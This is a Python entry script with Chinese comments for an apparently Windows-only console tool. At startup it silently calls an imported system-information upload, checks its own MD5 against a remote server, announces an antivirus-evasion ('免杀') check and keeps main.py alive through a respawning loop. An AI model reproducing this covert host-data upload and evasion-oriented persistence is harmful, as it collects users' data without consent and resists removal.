# 首先，按照标准库和第三方库的顺序进行导入
import os  # 系统操作相关模块
import sys  # 系统特定参数和函数
import platform  # 提供系统平台详细信息模块
import random
import string
import time
import ctypes

# 第三方库导入（按字母顺序排列）
import ctypes
import colorama  # 控制台颜色输出模块
import qrcode
import psutil
import matplotlib.pyplot as plt
from colorama import init, Fore, Style

import tkinter as tk
from PIL import Image, ImageDraw
import pystray
from pystray import MenuItem, Icon
import getpass  # 密码输入模块
import hashlib  # 散列和加密模块
import json  # JSON数据处理模块
import PIL  # Python图像处理库
from PIL import Image  # 导入PIL中的Image模块
import psutil  # 进程和系统实用工具模块
import requests  # HTTP请求模块
import subprocess  # 子进程管理模块
from urllib.parse import urljoin  # URL解析模块
from bs4 import BeautifulSoup  # HTML或XML解析模块
import win32api  # Windows API接口模块
import win32security  # Windows 安全API模块

# 导入check_running模块
import check_running
from index_main import handle_user_input
from zi import print_lines_with_delay, text_lines
from main_login import login
from upload_system_info import upload_system_info
from is_admin import is_admin, show_message_box
# 定义全局服务器地址
global_server_address = 'http://1nvweb.top'
# 初始化 Colorama
init(autoreset=True)

# 定义颜色类
class Colors:
    RED = Fore.RED
    GREEN = Fore.GREEN
    YELLOW = Fore.YELLOW
    BLUE = Fore.BLUE
    MAGENTA = Fore.MAGENTA
    CYAN = Fore.CYAN
    END = Style.RESET_ALL
# 定义 ANSI 转义码
class colors:
    RED = '\033[91m'
    GREEN = '\033[92m'
    YELLOW = '\033[93m'
    BLUE = '\033[94m'
    MAGENTA = '\033[95m'
    CYAN = '\033[96m'
    END = '\033[0m'

def maximize_cmd():
    if sys.platform == "win32":
        # 在 Windows 上，使用 'mode con' 命令来设置窗口大小
        os.system('mode con: cols=300 lines=200')  # 你可以根据需要调整列数和行数
        os.system('title My Command Prompt')  # 设置窗口标题（可选）

maximize_cmd()
#---------------------------检测是否管理员----------------------------
# # 获取当前控制台颜色
# handle = ctypes.windll.kernel32.GetStdHandle(-11)
# console_info = ctypes.create_string_buffer(16)
# ctypes.windll.kernel32.GetConsoleScreenBufferInfo(handle, console_info)

# # 提取当前颜色
# current_colors = console_info[4:6]
# foreground = current_colors[0]
# background = current_colors[1]

# # 反转颜色
# new_colors = background + (foreground & 0x0F)  # 仅反转前景色
# ctypes.windll.kernel32.SetConsoleTextAttribute(handle, new_colors)
#--------------------------------调用--------------------------------
if is_admin():
    # 延迟一毫秒
    time.sleep(0.001)
    #show_message_box("当前用户以管理员权限运行", "权限提示")
else:
    show_message_box("注意：当前用户没有管理员权限", "权限提示")
#----------------------------------结束调用————————————————————————————————


# 执行逐行打印
print_lines_with_delay(text_lines, delay=0.02)
command_history = []
# #--------------------------------------上传系统信息-----------------------------------
# 调用函数上传系统信息
upload_system_info()

# class ProcessKeeper:
#     def __init__(self, script_path):
#         self.script_path = script_path
#         self.process = None

#     def is_process_running(self, pid):
#         """检查进程是否仍在运行"""
#         try:
#             os.kill(pid, 0)
#         except OSError:
#             return False
#         return True

#     def start_process(self):
#         """启动子进程"""
#         self.process = subprocess.Popen(["python", self.script_path])
#         print(f"启动进程 PID: {self.process.pid}")

#     def monitor(self):
#         """监控进程并保活"""
#         self.start_process()
#         while True:
#             time.sleep(5)  # 每5秒检查一次
#             if not self.is_process_running(self.process.pid):
#                 print("进程已停止，重新启动...")
#                 self.start_process()

class ProcessKeeper:
    def __init__(self, script_path):
        self.script_path = script_path
        self.process = None

    def is_process_running(self, pid):
        """检查进程是否仍在运行"""
        try:
            os.kill(pid, 0)
        except OSError:
            return False
        return True

    def start_process(self):
        """启动子进程"""
        self.process = subprocess.Popen(["python", self.script_path])
        print(f"启动进程 PID: {self.process.pid}")

    def monitor(self):
        """监控进程并保活"""
        self.start_process()
        while True:
            time.sleep(5)
            if not self.is_process_running(self.process.pid):
                print("进程已停止，重新启动...")
                self.start_process()

class TrayIcon:
    def __init__(self, process_keeper):
        self.process_keeper = process_keeper
        self.icon = Icon("test_icon")
        self.icon.icon = self.create_image()
        self.icon.title = "进程保活"
        self.icon.menu = pystray.Menu(
            MenuItem("退出", self.exit_action)
        )

    def create_image(self):
        # 创建托盘图标
        width = 64
        height = 64
        image = Image.new('RGB', (width, height), color=(255, 255, 255))
        dc = ImageDraw.Draw(image)
        dc.rectangle((0, 0, width, height), fill=(255, 0, 0))
        return image

    def exit_action(self, icon, item):
        icon.stop()
        # 关闭进程
        if self.process_keeper.process:
            self.process_keeper.process.terminate()

    def run(self):
        self.icon.run()

class App:
    def __init__(self, process_keeper):
        self.process_keeper = process_keeper
        self.root = tk.Tk()
        self.root.title("进程保活")
        self.root.protocol("WM_DELETE_WINDOW", self.hide_window)
        self.tray_icon = TrayIcon(process_keeper)

        tk.Button(self.root, text="保活系统", command=self.start_monitoring).pack(pady=20)
        tk.Button(self.root, text="退出", command=self.exit_app).pack(pady=20)

    def hide_window(self):
        self.root.withdraw()
        self.tray_icon.run()

    def start_monitoring(self):
        # 启动监控
        self.process_keeper.monitor()

    def exit_app(self):
        self.root.quit()


# 示例使用
# keeper = ProcessKeeper("your_script.py")
# keeper.monitor()

# 在另一个 Python 文件中，可以这样使用这个模块：

# from process_keeper import ProcessKeeper

# keeper = ProcessKeeper("your_script.py")
# keeper.monitor()
# ====================================================================================================================
# 计算文件的 MD5 值
def calculate_md5(file_path):
    with open(file_path, 'rb') as f:
        md5 = hashlib.md5()
        while True:
            data = f.read(4096)
            if not data:
                break
            md5.update(data)
    return md5.hexdigest()

# 发送当前程序的 MD5 值到后端进行校验
def calculate_md5(file_path):
    md5_hash = hashlib.md5()
    with open(file_path, "rb") as f:
        for chunk in iter(lambda: f.read(4096), b""):
            md5_hash.update(chunk)
    return md5_hash.hexdigest()

def send_md5_to_backend(md5):
    url = f'{global_server_address}/tools/md5.php'
    payload = {'md5': md5}
    response = requests.post(url, data=payload)
    return response.text

def main():
    check_running.main_345678()  # 调用模块中的main函数

if __name__ == "__main__":
    file_path = sys.argv[0]
    
    # 计算当前程序的 MD5 值
    current_md5 = calculate_md5(file_path)

    # 发送 MD5 值到后端进行校验
    backend_response = send_md5_to_backend(current_md5)

    if backend_response != 'valid':
        print(f"{colors.RED}MD5 校验失败{colors.END}(可能的原因：1.程序被篡改 2.未连接到校验服务器)，当前程序的 MD5 值为:", current_md5)
        print("程序将在 5 秒后销毁...")
        # time.sleep(1)  # 等待5秒
        # print("4...")
        # time.sleep(1)  # 等待5秒
        # print("3...")
        # time.sleep(1)  # 等待5秒
        # print("2...")
        # time.sleep(1)  # 等待5秒
        # print("1...")
        # time.sleep(1)  # 等待5秒
        # print("0")
        # print("===================================================================")
        # sys.exit(1)

    print("MD5 校验通过，程序正常运行。")
    print("免杀校验...")
    login()
    main()
    handle_user_input
    process_keeper = ProcessKeeper("main.py")
    app = App(process_keeper)
    app.root.mainloop()



# if __name__ == "__main__":
    